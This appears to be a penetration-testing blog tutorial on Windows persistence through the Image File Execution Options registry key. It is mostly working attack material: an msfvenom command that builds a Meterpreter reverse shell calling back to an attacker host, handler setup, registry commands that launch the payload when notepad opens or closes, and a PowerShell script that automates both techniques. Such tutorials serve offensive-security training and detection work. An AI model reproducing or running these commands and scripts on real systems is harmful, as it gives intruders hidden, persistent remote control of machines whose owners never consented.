Image File Execution Options is a Windows registry key which enables developers to attach a debugger to an application and to enable “GlobalFlag” for application debugging. This behavior of Windows opens the door for persistence since an arbitrary executable can be used as a debugger of a specific process or as a “MonitorProcess“. In both scenarios code execution will achieved and the trigger will be either the creation of a process or the exit of an application. However it should be noted that the implementation of this technique requires Administrator level privileges as the registry location which the keys needs to be added is under:

• HKEY_LOCAL_MACHINE

GlobalFlag

Oddvar Moe discussed first in his blog the persistence technique via GlobalFlag. The implementation of this technique requires the creation of three registry keys and an arbitrary payload that will be executed upon a specific event (notepad application is closed). Metasploit utility “msfvenom” can be used to generate the malicious payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > pentestlab.exe

The “handler” Metasploit module needs to be configured in order to capture the payload that will executed on the target system.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
exploit

Executing the following commands as an Administrator user will create the necessary registry keys to implement the persistence technique via “GlobalFlag”.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\pentestlab.exe"

The hexadecimal value 0x200 in the “GlobalFlag” registry key enables the silent exit monitoring for the notepad process.

The ReportingMode registry key enables the Windows Error Reporting process (WerFault.exe) which will be the parent process of the “MonitorProcess” pentestlab.exe.

When the notepad process is killed (user has closed the notepad application) the payload will be executed and the communication will establish with the command and control.

This will cause the system to create a new process called “WerFault.exe” which is used for tracking errors related to operating system, Windows features and applications. The payload will be launched as a child process of Windows Error Reporting (WerFault.exe).

Debugger

Attaching a debugger into the notepad process is trivial and only requires the creation of a registry key and the malicious payload to be stored in “System32“.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "pentestlab.exe"

Executing the above command from an elevated command prompt will create the registry key “Debugger“. The value of this key defines the executable that will be attached to the notepad process which is going to be an arbitrary payload.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe

When the notepad process (notepad.exe) is launched this will cause the arbitrary payload to be executed and a Meterpreter session will open.

The Debugger registry key will create a new process on the system.

PowerShell

These two persistence techniques can be automated through the following PowerShell script. The official Gist can be found here. The script has two functions and will create the registry keys required per each technique automatically.

<#
    ImageFileExecutionOptions v1.0
    License: GPLv3
    Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique 

function Persist-Debugger

{

    $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

    Push-Location
    Set-Location $Registry

    if(Test-Path "$Registry\Image File Execution Options\notepad.exe"){

    Write-Verbose 'Key Already Exists' -Verbose

    }else{

    New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe'

	$GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe'

	$GetIFEO = Get-Item -Path "$GetRegKey"

	$Payload = 'pentestlab.exe'
	
	$GetIFEO | Set-ItemProperty -Name Debugger -Value $Payload
}
}

function Persist-GlobalFlags

{

    $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

    Push-Location
    Set-Location $Registry

    if(Test-Path "$Registry\SilentProcessExit"){

    Write-Verbose 'Key Already Exists' -Verbose

    }else{

    New-Item -Path "$Registry" -Name 'SilentProcessExit'
    New-Item -Path "$Registry\SilentProcessExit" -Name 'notepad.exe'
    New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe'

    $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe'
    $GetReg = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe'

	$GetIFEO = Get-Item -Path "$GetRegKey"
    $GetIF = Get-Item -Path "$GetReg"

	$Payload = 'C:\temp\pentestlab.exe'
	
	$GetIFEO | New-ItemProperty -Name MonitorProcess -Value $Payload
    $GetIFEO | New-ItemProperty -Name ReportingMode -Value 1 -PropertyType "DWORD"
    $GetIF | New-ItemProperty -Name GlobalFlag -Value 512 -PropertyType "DWORD"

    }
    }

Executing the following commands will import the module and the function “Persist-Debugger” can be utilized to implement the technique. By default the notepad.exe process is used and the payload needs to be stored in: “C:\Windows\System32“.

Import-Module .\ImageFileExecutionOptions.ps1
Persist-Debugger

Similarly to the method above the “Persist-GlobalFlags” function will create the two registry hives and will populate them with the required registry keys to perform persistence via the GlobalFlag.

Import-Module .\ImageFileExecutionOptions.ps1
Persist-GlobalFlags

References

• https://attack.mitre.org/techniques/T1183/
• https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79
• https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
• https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/
• https://wikileaks.org/ciav7p1/cms/page_2621770.html
• https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
• http://blogs.microsoft.co.il/pavely/2016/04/09/code-injection-with-image-file-execution-options-2/